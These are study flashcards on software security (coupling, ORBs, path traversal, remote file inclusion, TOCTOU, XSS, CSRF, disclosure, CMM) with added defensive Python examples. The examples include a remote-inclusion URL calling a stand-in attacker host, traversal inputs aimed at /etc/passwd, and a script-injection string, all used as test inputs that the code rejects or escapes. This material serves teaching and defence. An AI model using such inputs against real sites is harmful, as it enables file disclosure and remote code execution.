Domain 8: Software Security Flashcards
- OOP Term
- Used to describe the level of an object’s dependence on other objects (how much it must call into, or know the internals of, other objects to do its work)
Coupling
- OOP Term
- Used to describe the level of an object’s independence from other objects: how closely its own data and methods belong to a single, well-defined purpose
Cohesion
- OOP Terms
- Object that greatly depends on other objects
High Coupling and Low Cohesion
- OOP Terms
- Object that is mostly independent from other objects
High Cohesion and Low Coupling
- Middleware used to locate objects; act as a “search engine” for objects
- Connects programs to programs
- e.g. COM, DCOM, CORBA
Object Request Brokers (ORBs)
Escaping from the root of the web server (e.g. /var/www) into the rest of the file system by referencing parent directories such as “../”
Directory Path Traversal
Altering normal PHP URLs and variables to include and execute remote content
e.g. http://good.example.com?file=http://evil.example.com/bad.php
Remote File Inclusion (RFI)
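The two flashcards above are the same input-validation failure seen from two sides: a `file` parameter is joined into a path (traversal) or handed to an include that accepts URLs (RFI). The following is an added example, not part of the original flashcards, showing one resolver that rejects both. The web root `/srv/www`, the function names and the sample inputs are constructed for illustration.

```python
"""Added example: validate a user-supplied `file` parameter against both
directory path traversal and remote file inclusion. Illustration code,
not from the original flashcards; all inputs below are constructed."""
import os
from urllib.parse import urlsplit


def resolve_include(web_root: str, requested: str) -> str:
    """Return the absolute path that `requested` maps to inside `web_root`.

    Raises ValueError when the request is:
      * a URL or stream wrapper (http://, //host/, php://, ...) -> RFI, or
      * a path whose normalised form lies outside web_root -> traversal.

    Assumes the caller has already URL-decoded `requested` exactly once
    (a web server normally does this before the application sees it).
    """
    parts = urlsplit(requested)
    if parts.scheme or parts.netloc:
        # "http://evil.example.com/bad.php", "//evil.example.com/x", "php://input"
        raise ValueError(f"remote or wrapper include rejected: {requested!r}")

    root = os.path.realpath(web_root)
    # Strip a leading "/" so "/etc/passwd" is treated as web_root/etc/passwd,
    # then collapse every "..", "." and "//" *before* the containment check.
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes web root: {requested!r}")
    return candidate


def is_safe_include(web_root: str, requested: str) -> bool:
    """Boolean wrapper around resolve_include() for policy checks / tests."""
    try:
        resolve_include(web_root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for req in ("pages/about.html", "pages/../index.html",
                "../../etc/passwd", "http://evil.example.com/bad.php",
                "//evil.example.com/bad.php", "php://input"):
        print(f"{req!r:40} -> {'allow' if is_safe_include('/srv/www', req) else 'REJECT'}")
```

Note the order of operations: normalise first (realpath collapses `..`), then compare the canonical result against the canonical root. Checking for the literal substring `../` in the raw input is weaker, since `....//` or double-encoded variants can slip through a substring filter but not a canonical-path comparison.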
Attacker attempts to alter a condition after it has been checked (by the OS or the application), but before the result of that check is used
Time of check/Time of use (TOC/TOU) attacks aka Race conditions
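To make the race window concrete, the following added example (not from the original flashcards) shows a check-then-open routine with an explicit attacker hook in the gap, beside a version that opens first and checks the descriptor it actually got. The `attacker_window` callback, file names and contents are constructed to stand in for the real race.

```python
"""Added example: TOC/TOU on a file path. Illustration code, not from the
original flashcards. The attacker's swap is simulated by a callback placed
exactly where a real attacker would race the program."""
import os
import stat
import tempfile


def read_if_regular_vulnerable(path, attacker_window=lambda: None):
    """Checks the *name*, then opens the *name* again: the classic TOCTOU bug."""
    st = os.lstat(path)                       # time of check
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("refusing: not a regular file")
    attacker_window()                         # race window: the name can be re-pointed here
    with open(path, "rb") as f:               # time of use: possibly a different object
        return f.read()


def read_if_regular_safe(path, attacker_window=lambda: None):
    """Opens once, then checks the *descriptor*: nothing can change what fd refers to."""
    attacker_window()                         # a swap here just makes the open fail closed
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # symlink -> OSError (ELOOP)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):   # check the object we hold
            raise PermissionError("refusing: not a regular file")
        with os.fdopen(fd, "rb") as f:        # fdopen takes ownership of fd
            fd = -1
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Run both versions against the same simulated race; returns what each did."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")
        secret = os.path.join(d, "secret.txt")   # constructed stand-in for a protected file
        with open(public, "wb") as f:
            f.write(b"harmless")
        with open(secret, "wb") as f:
            f.write(b"secret")

        def swap():                           # attacker: replace the checked name with a link
            os.unlink(public)
            os.symlink(secret, public)

        leaked = read_if_regular_vulnerable(public, swap)

        os.unlink(public)                     # reset to the same starting state
        with open(public, "wb") as f:
            f.write(b"harmless")
        try:
            read_if_regular_safe(public, swap)
            blocked = False
        except OSError:                       # O_NOFOLLOW refuses the symlink
            blocked = True
        return {"vulnerable_read": leaked, "safe_version_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The fix is not "check faster": it is to make the check and the use refer to the same kernel object. Once you hold a file descriptor, `fstat()` describes exactly what a later `read()` will touch, so there is no window for the name to be re-pointed in between. `O_NOFOLLOW` additionally refuses a symlink at the final path component, which is the usual way an attacker redirects the name.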
Attacker-supplied script runs in the victim’s browser within the security context of a trusted site, because the site echoes third-party (untrusted) input into its pages without proper encoding
Cross-site scripting (XSS)
Leverages a third-party page to make the victim’s browser send a request (e.g. via a redirect or embedded static content such as an image tag) within the security context of a trusted site where the victim is already authenticated
Cross-site request forgery (CSRF)
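The XSS and CSRF cards above describe the two ways a third party abuses a trusted site’s security context: injecting script into its pages, and having the victim’s browser submit requests to it. The following added example (not code from the original flashcards) renders a profile form that escapes untrusted output and carries a session-bound CSRF token, then checks that token on submit. The secret key, session identifiers, route and form fields are constructed for illustration.

```python
"""Added example: output encoding against XSS and an HMAC-based CSRF token.
Illustration code, not from the original flashcards; key and inputs are
constructed. In a real deployment generate the key with secrets.token_bytes()."""
import hashlib
import hmac
import html

SERVER_SECRET = b"constructed-demo-key-replace-in-production"  # never sent to the client


def csrf_token(session_id: str, key: bytes = SERVER_SECRET) -> str:
    """Token bound to the session. A third-party site cannot compute it because it
    never sees the server key, and it cannot read it cross-origin from the form."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, presented, key: bytes = SERVER_SECRET) -> bool:
    """Constant-time comparison so the check does not leak the token byte by byte."""
    if not isinstance(presented, str):
        return False
    return hmac.compare_digest(csrf_token(session_id, key), presented)


def render_profile_form(session_id: str, display_name: str) -> str:
    """XSS defence: every untrusted value is escaped for the context it lands in
    (here an HTML attribute, so quotes are escaped too)."""
    safe_name = html.escape(display_name, quote=True)
    return (
        '<form method="post" action="/profile">'
        f'<input type="hidden" name="csrf" value="{csrf_token(session_id)}">'
        f'<input name="display_name" value="{safe_name}">'
        "<button>Save</button></form>"
    )


def handle_profile_post(session_id: str, form: dict) -> str:
    """CSRF defence: a forged cross-site POST arrives with the victim's cookies,
    but without a token the attacker could have computed or read."""
    if not csrf_token_valid(session_id, form.get("csrf")):
        return "403 Forbidden: missing or invalid CSRF token"
    return "200 OK: profile updated"


if __name__ == "__main__":
    sid = "session-abc123"                     # constructed session identifier
    print(render_profile_form(sid, '"><script>alert(1)</script>'))
    print(handle_profile_post(sid, {"csrf": csrf_token(sid), "display_name": "x"}))
    print(handle_profile_post(sid, {"display_name": "x"}))                 # forged, no token
    print(handle_profile_post(sid, {"csrf": csrf_token("other-session")}))  # wrong session
```

Two details matter in practice. The escaping must match the output context (attribute here; JavaScript or URL contexts need different encoders), since `html.escape` alone does not make a value safe inside a `<script>` block. And the CSRF token must be tied to the session, not just random, otherwise an attacker can obtain a valid token with their own session and replay it in the forged request.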
Describes actions taken by the security researcher after discovering a software vulnerability
Disclosure
Practice of releasing vulnerability details publicly
Full disclosure
Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available
Responsible disclosure
- Framework intended to help software organizations improve the maturity and quality of their software process
- Categorizes the 5 stages an organization’s software processes go through to reach maturity
- Maturity framework for evaluating and improving the software development process
Software Capability Maturity Model (CMM)
Name the 5 stages of the Software Capability Maturity Model (CMM)
- Initial
- Repeatable
- Defined
- Managed
- Optimizing